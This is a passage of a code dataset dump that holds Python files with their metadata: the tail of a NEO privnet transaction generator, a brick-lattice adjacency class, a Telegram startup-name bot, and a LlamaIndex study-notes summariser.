closed\")\n sleep(2)\n logger.info(\"Generating raw transactions\")\n\n # In this block we generating raw transactions\n for i in range(int(TOTAL_AMOUNT/BLOCK_AMOUNT)):\n hashes += construct_raw_many(BLOCK_AMOUNT, i*BLOCK_AMOUNT, wallet_db, txsNeo[i], txsGas[i])\n\n write_raw_db(hashes, TX_FILE)\n\n\n except Exception as ex:\n logger.info(ex)\n traceback.print_stack()\n traceback.print_exc()\n reactor.stop()\n return\n\n # After main_routine we stop application\n reactor.stop()\n return\n\n\ndef main():\n # Parse args\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-n\", help=\"total amount of transactions\", type=int)\n parser.add_argument(\"--walletneo\", help=\"premade NEO in wallet\", type=int)\n parser.add_argument(\"--walletgas\", help=\"premade GAS in wallet\", type=int)\n parser.add_argument(\"--txneo\", help=\"amount of sending NEO\", type=int)\n parser.add_argument(\"--txfee\", help=\"tx fee\", type=float)\n parser.add_argument(\"-f\", help=\"file to save raw transactions\", type=str)\n args = parser.parse_args()\n\n global TOTAL_AMOUNT\n global PREMADE_GAS\n global PREMADE_NEO\n global TX_NEO\n global TX_FEE\n global TX_FILE\n\n if args.n:\n TOTAL_AMOUNT = args.n\n if args.walletgas:\n PREMADE_GAS = args.walletgas\n if args.walletneo:\n PREMADE_NEO = args.walletneo\n if args.txneo:\n TX_NEO = args.tx\n if args.txfee:\n TX_FEE = PREMADE_GAS - args.txfee\n if args.f:\n TX_FILE = args.f\n\n # Use TestNet\n settings.setup_privnet()\n\n # Setup the blockchain\n blockchain = LevelDBBlockchain(settings.chain_leveldb_path)\n Blockchain.RegisterBlockchain(blockchain)\n dbloop = task.LoopingCall(Blockchain.Default().PersistBlocks)\n dbloop.start(.5)\n NodeLeader.Instance().Start()\n\n d = threading.Thread(target=main_routine)\n d.setDaemon(True)\n d.start()\n\n # Awaiting exit here\n reactor.run()\n logger.info(\"Shutting down.\")\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "nspcc-dev/neo-test-flow", "sub_path": "scripts/tx-gen.py", "file_name": "tx-gen.py", "file_ext": "py", "file_size_in_byte": 12929, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "neo.Core.TX.Transaction.TXFeeError", "line_number": 64, "usage_type": "name"}, {"api_name": "neo.Core.Blockchain.Blockchain.Default", "line_number": 78, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 78, "usage_type": "name"}, {"api_name": "neo.Core.TX.TransactionAttribute.TransactionAttribute", "line_number": 98, "usage_type": "call"}, {"api_name": "neo.Core.TX.TransactionAttribute.TransactionAttributeUsage.Script", "line_number": 98, "usage_type": "attribute"}, {"api_name": "neo.Core.TX.TransactionAttribute.TransactionAttributeUsage", "line_number": 98, "usage_type": "name"}, {"api_name": "neo.SmartContract.ContractParameterContext.ContractParametersContext", "line_number": 104, "usage_type": "call"}, {"api_name": "neo.Network.NodeLeader.NodeLeader.Instance", "line_number": 109, "usage_type": "call"}, {"api_name": "neo.Network.NodeLeader.NodeLeader", "line_number": 109, "usage_type": "name"}, {"api_name": "traceback.print_stack", "line_number": 125, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 126, "usage_type": "call"}, {"api_name": "logzero.logger.info", "line_number": 131, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 131, "usage_type": "name"}, {"api_name": "neo.Prompt.Utils.get_asset_id", "line_number": 135, "usage_type": "call"}, {"api_name": "neo.Prompt.Utils.lookup_addr_str", "line_number": 137, "usage_type": "call"}, {"api_name": "logzero.logger.debug", "line_number": 139, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 139, "usage_type": "name"}, {"api_name": "neo.Prompt.Utils.get_asset_amount", "line_number": 141, "usage_type": "call"}, {"api_name": "logzero.logger.debug", "line_number": 143, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 143, "usage_type": "name"}, {"api_name": "neo.Core.TX.Transaction.TransactionOutput", "line_number": 145, "usage_type": "call"}, {"api_name": "neo.Core.TX.Transaction.ContractTransaction", "line_number": 150, "usage_type": "call"}, {"api_name": "neocore.Fixed8.Fixed8.Zero", "line_number": 156, "usage_type": "call"}, {"api_name": "neocore.Fixed8.Fixed8", "line_number": 156, "usage_type": "name"}, {"api_name": "neo.Core.Blockchain.Blockchain.SystemCoin", "line_number": 162, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 162, "usage_type": "name"}, {"api_name": "neo.Core.Blockchain.Blockchain.SystemShare", "line_number": 163, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 163, "usage_type": "name"}, {"api_name": "neo.Implementations.Wallets.peewee.UserWallet.UserWallet.Open", "line_number": 166, "usage_type": "call"}, {"api_name": "neo.Implementations.Wallets.peewee.UserWallet.UserWallet", "line_number": 166, "usage_type": "name"}, {"api_name": "neo.Wallets.utils.to_aes_key", "line_number": 166, "usage_type": "call"}, {"api_name": "neo.Core.TX.Transaction.ContractTransaction", "line_number": 171, "usage_type": "call"}, {"api_name": "neo.Core.CoinReference.CoinReference", "line_number": 175, "usage_type": "call"}, {"api_name": "neocore.UInt256.UInt256.ParseString", "line_number": 175, "usage_type": "call"}, {"api_name": "neocore.UInt256.UInt256", "line_number": 175, "usage_type": "name"}, {"api_name": "neo.Core.CoinReference.CoinReference", "line_number": 176, "usage_type": "call"}, {"api_name": "neocore.UInt256.UInt256.ParseString", "line_number": 176, "usage_type": "call"}, {"api_name": "neocore.UInt256.UInt256", "line_number": 176, "usage_type": "name"}, {"api_name": "neo.Core.TX.Transaction.TransactionOutput", "line_number": 180, "usage_type": "call"}, {"api_name": "neocore.Fixed8.Fixed8.FromDecimal", "line_number": 180, "usage_type": "call"}, {"api_name": "neocore.Fixed8.Fixed8", "line_number": 180, "usage_type": "name"}, {"api_name": "neo.Core.TX.Transaction.TransactionOutput", "line_number": 181, "usage_type": "call"}, {"api_name": "neocore.Fixed8.Fixed8.FromDecimal", "line_number": 181, "usage_type": "call"}, {"api_name": "neocore.Fixed8.Fixed8", "line_number": 181, "usage_type": "name"}, {"api_name": "neo.Core.TX.Transaction.TransactionOutput", "line_number": 182, "usage_type": "call"}, {"api_name": "neocore.Fixed8.Fixed8.FromDecimal", "line_number": 182, "usage_type": "call"}, {"api_name": "neocore.Fixed8.Fixed8", "line_number": 182, "usage_type": "name"}, {"api_name": "neo.SmartContract.ContractParameterContext.ContractParametersContext", "line_number": 186, "usage_type": "call"}, {"api_name": "logzero.logger.info", "line_number": 203, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 203, "usage_type": "name"}, {"api_name": "neo.Core.Blockchain.Blockchain.Default", "line_number": 214, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 214, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 215, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 215, "usage_type": "name"}, {"api_name": "neo.Core.Blockchain.Blockchain.Default", "line_number": 215, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 215, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 216, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain.Default", "line_number": 220, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 220, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 221, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 221, "usage_type": "name"}, {"api_name": "neo.Implementations.Wallets.peewee.UserWallet.UserWallet.Open", "line_number": 227, "usage_type": "call"}, {"api_name": "neo.Implementations.Wallets.peewee.UserWallet.UserWallet", "line_number": 227, "usage_type": "name"}, {"api_name": "neo.Wallets.utils.to_aes_key", "line_number": 227, "usage_type": "call"}, {"api_name": "twisted.internet.task.LoopingCall", "line_number": 228, "usage_type": "call"}, {"api_name": "twisted.internet.task", "line_number": 228, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 231, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 231, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 235, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 249, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain.Default", "line_number": 250, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 250, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 253, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 268, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain.Default", "line_number": 269, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 269, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 272, "usage_type": "call"}, {"api_name": "logzero.logger.info", "line_number": 276, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 276, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 277, "usage_type": "call"}, {"api_name": "logzero.logger.info", "line_number": 278, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 278, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 288, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 288, "usage_type": "name"}, {"api_name": "traceback.print_stack", "line_number": 289, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 290, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.stop", "line_number": 291, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 291, "usage_type": "name"}, {"api_name": "twisted.internet.reactor.stop", "line_number": 295, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 295, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 301, "usage_type": "call"}, {"api_name": "neo.Settings.settings.setup_privnet", "line_number": 331, "usage_type": "call"}, {"api_name": "neo.Settings.settings", "line_number": 331, "usage_type": "name"}, {"api_name": "neo.Implementations.Blockchains.LevelDB.LevelDBBlockchain.LevelDBBlockchain", "line_number": 334, "usage_type": "call"}, {"api_name": "neo.Settings.settings.chain_leveldb_path", "line_number": 334, "usage_type": "attribute"}, {"api_name": "neo.Settings.settings", "line_number": 334, "usage_type": "name"}, {"api_name": "neo.Core.Blockchain.Blockchain.RegisterBlockchain", "line_number": 335, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 335, "usage_type": "name"}, {"api_name": "twisted.internet.task.LoopingCall", "line_number": 336, "usage_type": "call"}, {"api_name": "twisted.internet.task", "line_number": 336, "usage_type": "name"}, {"api_name": "neo.Core.Blockchain.Blockchain.Default", "line_number": 336, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 336, "usage_type": "name"}, {"api_name": "neo.Network.NodeLeader.NodeLeader.Instance", "line_number": 338, "usage_type": "call"}, {"api_name": "neo.Network.NodeLeader.NodeLeader", "line_number": 338, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 340, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.run", "line_number": 345, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 345, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 346, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 346, "usage_type": "name"}]}
+{"seq_id": "75087011606", "text": "import math\nimport numpy as np\nfrom typing import Sequence\nfrom qib.lattice import AbstractLattice\nfrom qib.lattice.shifted_lattice_convention import ShiftedLatticeConvention\n\n\nclass BrickLattice(AbstractLattice):\n \"\"\"\n Brick lattice.\n The lattice has n full rectangles per row and m full rectangles per column.\n \"\"\"\n def __init__(self, shape: Sequence[int], pbc=False, delete=False, convention: ShiftedLatticeConvention=ShiftedLatticeConvention.COLS_SHIFTED_UP):\n if len(shape) != 2:\n raise NotImplementedError(\"Brick lattices require 2 dimensions, {len(shape)} were given\")\n self.shape = tuple(shape)\n self.convention = convention\n self.shape_square = self._shape_square\n self.nsites_square = self._nsites_square\n self.delete = delete\n if pbc is True:\n # TODO: add pbc in adjacency matrix\n raise NotImplementedError(\"The brick lattice doesn't hold periodic boundary conditions yet\")\n self.pbc = pbc\n\n @property\n def nsites(self) -> int:\n \"\"\"\n Number of lattice sites.\n If delete=False, it includes the 2 extra points if they are needed.\n \"\"\"\n if not self.delete and ((self.convention == ShiftedLatticeConvention.COLS_SHIFTED_UP and self.shape[1]>1) or (self.convention == ShiftedLatticeConvention.ROWS_SHIFTED_LEFT and self.shape[0]>1)):\n return 2*self.shape[0]*self.shape[1] + 2*(self.shape[0]+self.shape[1]) + 2\n else:\n return 2*self.shape[0]*self.shape[1] + 2*(self.shape[0]+self.shape[1])\n\n @property\n def ndim(self) -> int:\n \"\"\"\n Number of spatial dimensions.\n \"\"\"\n return len(self.shape)\n\n @property\n def _shape_square(self) -> tuple:\n \"\"\"\n Shape of the equivalent square lattice.\n Includes the 2 extra points.\n \"\"\"\n if self.convention == ShiftedLatticeConvention.COLS_SHIFTED_UP:\n if self.shape[1]>1:\n nrows_square = 2*self.shape[0]+2\n else:\n nrows_square = 2*self.shape[0]+1\n ncols_square = self.shape[1]+1\n if self.convention == ShiftedLatticeConvention.ROWS_SHIFTED_LEFT:\n if self.shape[0]>1:\n ncols_square = 2*self.shape[1]+2\n else:\n ncols_square = 2*self.shape[1]+1\n nrows_square = self.shape[0]+1\n return (nrows_square,ncols_square)\n\n @property\n def _nsites_square(self) -> int:\n \"\"\"\n Number of lattice sites in the equivalent square lattice.\n Includes the 2 extra points.\n \"\"\"\n return self.shape_square[0]*self.shape_square[1]\n\n def adjacency_matrix(self):\n \"\"\"\n Construct the adjacency matrix, indicating nearest neighbors.\n Brick lattice embedded in a square grid::\n\n _ _ _\n | |_| |_| |\n |_| |_| |_|\n . |_| |_| .\n\n If delete == True, the 2 extra points are eliminated from the adjacency matrix.\n Otherwise, they are just disconnected (corresponding rows and columns are 0)\n \"\"\"\n # An equivalent square graph is built.\n if self.convention == ShiftedLatticeConvention.COLS_SHIFTED_UP:\n d_square = 0\n parity_shift_condition = (self.shape[1]%2 == 1)\n\n if self.convention == ShiftedLatticeConvention.ROWS_SHIFTED_LEFT:\n d_square = 1\n parity_shift_condition = (self.shape[0]>1)\n\n adj = np.zeros((self.nsites_square, self.nsites_square), dtype=int)\n idx = np.arange(self.nsites_square).reshape(self.shape_square)\n # the y axis for COLS_SHIFTED_UP and x axis for ROWS_SHIFTED_LEFT are treated like the square graph case.\n # the other axis only has half of the connections.\n for d in range(self.ndim):\n for s in [-1, 1]:\n ids = np.roll(idx, s, axis=d)\n # single out axis `d`\n seld = (math.prod(self.shape_square[:d]), self.shape_square[d], math.prod(self.shape_square[d+1:]))\n idx_cut = idx.reshape(seld)\n ids_cut = ids.reshape(seld)\n if s == 1:\n idx_cut = idx_cut[:, 1:, :]\n ids_cut = ids_cut[:, 1:, :]\n elif s == -1:\n idx_cut = idx_cut[:, :-1, :]\n ids_cut = ids_cut[:, :-1, :]\n else:\n assert False\n if d == d_square:\n for (i, j) in zip(idx_cut.reshape(-1), ids_cut.reshape(-1)):\n adj[i, j] = 1\n else:\n for (i, j) in zip(idx_cut.reshape(-1), ids_cut.reshape(-1)):\n if parity_shift_condition:\n if (s == -1 and (i+i//self.shape_square[1])%2 == 0) or (s == 1 and (i+i//self.shape_square[1])%2 == 1):\n adj[i, j] = 1\n else:\n if (s == -1 and i%2 == 0) or (s == 1 and i%2 == 1):\n adj[i, j] = 1\n if self.delete:\n adj = self._delete_extra_points(adj)\n else:\n adj = self._disconnect_extra_points(adj)\n return adj\n\n def _delete_extra_points(self, adj):\n \"\"\"\n Deletes the 2 extra points from the adjacency matrix.\n \"\"\"\n if self.convention == ShiftedLatticeConvention.COLS_SHIFTED_UP and self.shape[1]>1:\n adj = np.delete(adj, (self.shape_square[0]-1)*self.shape_square[1], 0)\n adj = np.delete(adj, (self.shape_square[0]-1)*self.shape_square[1], 1)\n if self.shape_square[1]%2 == 0:\n adj = np.delete(adj, -1, 0)\n adj = np.delete(adj, -1, 1)\n else:\n adj = np.delete(adj, self.shape_square[1]-1, 0)\n adj = np.delete(adj, self.shape_square[1]-1, 1)\n if self.convention == ShiftedLatticeConvention.ROWS_SHIFTED_LEFT and self.shape[0]>1:\n adj = np.delete(adj, self.shape_square[1]-1, 0)\n adj = np.delete(adj, self.shape_square[1]-1, 1)\n if self.shape_square[0]%2 == 1:\n adj = np.delete(adj, (self.shape_square[0]-1)*self.shape_square[1]-1, 0)\n adj = np.delete(adj, (self.shape_square[0]-1)*self.shape_square[1]-1, 1)\n else:\n adj = np.delete(adj, -1, 0)\n adj = np.delete(adj, -1, 1)\n\n return adj\n\n def _disconnect_extra_points(self, adj):\n \"\"\"\n Disconnects the 2 extra points from the adjacency matrix.\n They are still counted in, but are not connected anymore to the rest of the lattice.\n \"\"\"\n if self.convention == ShiftedLatticeConvention.COLS_SHIFTED_UP and self.shape[1]>1:\n adj[(self.shape_square[0]-1)*self.shape_square[1], :] = 0\n adj[:, (self.shape_square[0]-1)*self.shape_square[1]] = 0\n if self.shape_square[1]%2 == 0:\n adj[-1, :] = 0\n adj[:, -1] = 0\n else:\n adj[self.shape_square[1]-1, :] = 0\n adj[:, self.shape_square[1]-1] = 0\n if self.convention == ShiftedLatticeConvention.ROWS_SHIFTED_LEFT and self.shape[0]>1:\n adj[self.shape_square[1]-1, :] = 0\n adj[:, self.shape_square[1]-1] = 0\n if self.shape_square[0]%2 == 1:\n adj[(self.shape_square[0]-1)*self.shape_square[1], :] = 0\n adj[:, (self.shape_square[0]-1)*self.shape_square[1]] = 0\n else:\n adj[-1, :] = 0\n adj[:, -1] = 0\n\n return adj\n\n def index_to_coord(self, i: int) -> tuple:\n \"\"\"\n Map linear index to the equivalent square lattice coordinate.\n If self.delete=True the two extra points of the equivalent square lattice are not counted in.\n \"\"\"\n shift = 0\n if self.delete:\n assert i < self.nsites\n if self.convention == ShiftedLatticeConvention.COLS_SHIFTED_UP and self.shape[1] > 1:\n if i >= self.shape_square[1]-1 and self.shape[1]%2 == 0:\n shift += 1\n if i >= (self.shape_square[0]-1)*self.shape_square[1]-shift:\n shift += 1\n if self.convention == ShiftedLatticeConvention.ROWS_SHIFTED_LEFT and self.shape[0] > 1:\n if i >= self.shape_square[1]-1:\n shift += 1\n if i >= (self.shape_square[0]-1)*self.shape_square[1]-shift and self.shape[0]%2 == 0:\n shift += 1\n return np.unravel_index((i+shift), self.shape_square)\n\n def coord_to_index(self, c) -> int:\n \"\"\"\n Map lattice coordinate to the equivalent square lattice coordinate.\n If delete=True the two extra points of the equivalent square lattice are not counted in.\n \"\"\"\n shift = 0\n if self.delete:\n if self.convention == ShiftedLatticeConvention.COLS_SHIFTED_UP and self.shape[1] > 1:\n # even and odd columns specific cases\n if self.shape[1]%2 == 0:\n if c[0] == 0 and c[1] == self.shape_square[1]-1:\n return None\n elif c[0] > 0:\n shift += 1\n else:\n if c[0] == self.shape_square[0]-1 and c[1] == self.shape_square[1]-1:\n return None\n # common shift for even and odd cases\n if c[0] == self.shape_square[0]-1:\n if c[1] == 0:\n return None\n else:\n shift += 1\n if self.convention == ShiftedLatticeConvention.ROWS_SHIFTED_LEFT and self.shape[0] > 1:\n # even and odd columns specific cases\n if self.shape[0]%2 == 0:\n if c[0] == self.shape_square[0]-1:\n if c[1] == 0:\n return None\n else:\n shift += 1\n else:\n if c[0] == self.shape_square[0]-1 and c[1] == self.shape_square[1]-1:\n return None\n # common shift for even and odd cases\n if c[0] == 0:\n if c[1] == self.shape_square[1]-1:\n return None\n else:\n shift += 1\n return int(np.ravel_multi_index(c, self.shape_square)) - shift\n", "repo_name": "qc-tum/qib", "sub_path": "src/qib/lattice/brick_lattice.py", "file_name": "brick_lattice.py", "file_ext": "py", "file_size_in_byte": 10550, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "31", "api": [{"api_name": "qib.lattice.AbstractLattice", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 13, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 13, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.COLS_SHIFTED_UP", "line_number": 13, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.COLS_SHIFTED_UP", "line_number": 32, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 32, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.ROWS_SHIFTED_LEFT", "line_number": 32, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.COLS_SHIFTED_UP", "line_number": 50, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 50, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.ROWS_SHIFTED_LEFT", "line_number": 56, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 56, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.COLS_SHIFTED_UP", "line_number": 86, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 86, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.ROWS_SHIFTED_LEFT", "line_number": 90, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 90, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 100, "usage_type": "call"}, {"api_name": "math.prod", "line_number": 102, "usage_type": "call"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.COLS_SHIFTED_UP", "line_number": 134, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 134, "usage_type": "name"}, {"api_name": "numpy.delete", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 142, "usage_type": "call"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.ROWS_SHIFTED_LEFT", "line_number": 143, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 143, "usage_type": "name"}, {"api_name": "numpy.delete", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 151, "usage_type": "call"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.COLS_SHIFTED_UP", "line_number": 160, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 160, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.ROWS_SHIFTED_LEFT", "line_number": 169, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 169, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.COLS_SHIFTED_UP", "line_number": 189, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 189, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.ROWS_SHIFTED_LEFT", "line_number": 194, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 194, "usage_type": "name"}, {"api_name": "numpy.unravel_index", "line_number": 199, "usage_type": "call"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.COLS_SHIFTED_UP", "line_number": 208, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 208, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.ROWS_SHIFTED_LEFT", "line_number": 224, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 224, "usage_type": "name"}, {"api_name": "numpy.ravel_multi_index", "line_number": 241, "usage_type": "call"}]}
+{"seq_id": "34699491499", "text": "import telebot\nfrom generator import Generator\n\ngenerator = Generator.load('my_model')\n\nbot = telebot.TeleBot(\"TOKEN\")\n\nmarkup = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True)\ngen_button = telebot.types.KeyboardButton('Generate')\nmarkup.add(gen_button)\n\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n start_message = 'Hi there!\\nPress \\\"Generate\\\" button to get a startup name.'\n bot.send_message(message.chat.id, start_message, reply_markup=markup)\n\n\n@bot.message_handler(commands=['help'])\ndef send_help(message):\n help_message = 'Press \\\"Generate\\\" button to get a startup name.'\n bot.send_message(message.chat.id, help_message)\n\n\n@bot.message_handler(func=lambda message: message.text == 'Generate')\ndef answer_message(message):\n bot.send_message(message.chat.id, generator.simulate(1))\n\n\nbot.polling()\n", "repo_name": "egor-sergeev/SPbU-homework", "sub_path": "Semester_5/computer_networks/bot/startupNameGeneratorBot.py", "file_name": "startupNameGeneratorBot.py", "file_ext": "py", "file_size_in_byte": 854, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "generator.Generator.load", "line_number": 4, "usage_type": "call"}, {"api_name": "generator.Generator", "line_number": 4, "usage_type": "name"}, {"api_name": "telebot.TeleBot", "line_number": 6, "usage_type": "call"}, {"api_name": "telebot.types.ReplyKeyboardMarkup", "line_number": 8, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 8, "usage_type": "attribute"}, {"api_name": "telebot.types.KeyboardButton", "line_number": 9, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 9, "usage_type": "attribute"}, {"api_name": "generator.simulate", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "14127571237", "text": "from llama_index.llms import Replicate\nfrom llama_index import set_global_tokenizer # set tokenizer to match LLM\nfrom transformers import AutoTokenizer\nfrom llama_index.embeddings import HuggingFaceEmbedding\nfrom llama_index import ServiceContext\nfrom llama_index import VectorStoreIndex, SimpleDirectoryReader\n\nquery_message = '''Using the data provided, write detailed study notes. \n Keep generating until you are finished summarizing the data.\n Ensure you use all the information provided. \n Make sure your response looks like a student wrote it during class. Limit each line in the response to 100 characters. \n Do not include information about the authors to keep it anonymous. '''\nllama2_7b_chat = \"meta/llama-2-7b-chat:8e6975e5ed6174911a6ff3d60540dfd4844201974602551e10e9e87ab143d81e\"\n\ndef llama_supernotes(folderpath):\n llm = Replicate(\n model=llama2_7b_chat,\n temperature=0.9,\n additional_kwargs={\"top_p\": 1, \"max_new_tokens\": 3000},\n )\n\n set_global_tokenizer(\n AutoTokenizer.from_pretrained(\"NousResearch/Llama-2-7b-chat-hf\").encode\n )\n\n embed_model = HuggingFaceEmbedding(model_name=\"BAAI/bge-small-en-v1.5\")\n service_context = ServiceContext.from_defaults(\n llm=llm, embed_model=embed_model\n )\n\n documents = SimpleDirectoryReader(folderpath).load_data()\n index = VectorStoreIndex.from_documents(\n documents, service_context=service_context\n )\n query_engine = index.as_query_engine()\n response = query_engine.query(query_message)\n if __name__ == \"__main__\":\n print(response.response)\n return response.response\n\nif __name__ == \"__main__\":\n llama_supernotes(\"docs\")\n\n", "repo_name": "ishaan-arya/note-mesh-student", "sub_path": "machine-learning/llm.py", "file_name": "llm.py", "file_ext": "py", "file_size_in_byte": 1682, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "llama_index.llms.Replicate", "line_number": 16, "usage_type": "call"}, {"api_name": "llama_index.set_global_tokenizer", "line_number": 22, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 23, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 23, "usage_type": "name"}, {"api_name": "llama_index.embeddings.HuggingFaceEmbedding", "line_number": 26, "usage_type": "call"}, {"api_name": "llama_index.ServiceContext.from_defaults", "line_number": 27, "usage_type": "call"}, {"api_name": "llama_index.ServiceContext", "line_number": 27, "usage_type": "name"}, {"api_name": "llama_index.SimpleDirectoryReader", "line_number": 31, "usage_type": "call"}, {"api_name": "llama_index.VectorStoreIndex.from_documents", "line_number": 32, "usage_type": "call"}, {"api_name": "llama_index.VectorStoreIndex", "line_number": 32, "usage_type": "name"}]}
